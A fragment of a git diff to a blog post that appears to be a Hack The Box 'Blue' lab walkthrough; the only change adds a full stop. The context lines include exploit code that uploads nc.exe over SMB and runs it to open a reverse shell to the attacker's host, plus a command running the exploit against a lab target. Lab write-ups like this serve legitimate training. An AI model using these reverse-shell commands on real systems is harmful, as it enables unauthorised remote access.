calxus/calxus.github.io/_posts/2020-03-13-blue-walkthrough.markdown

         smb_send_file(smbConn, 'nc.exe', 'C', '/nc.exe')
         service_exec(conn, r'cmd /c c:\nc.exe -nv 10.10.14.27 2121 -e cmd.exe')
 ```
-After running this exploit using the following command our netcat listener should receive a shell if it is listening on the same port
+After running this exploit using the following command our netcat listener should receive a shell if it is listening on the same port.
 ```
 root@79a4e2b0be9a:/blue# python blue.py 10.129.112.225
 Target OS: Windows 7 Professional 7601 Service Pack 1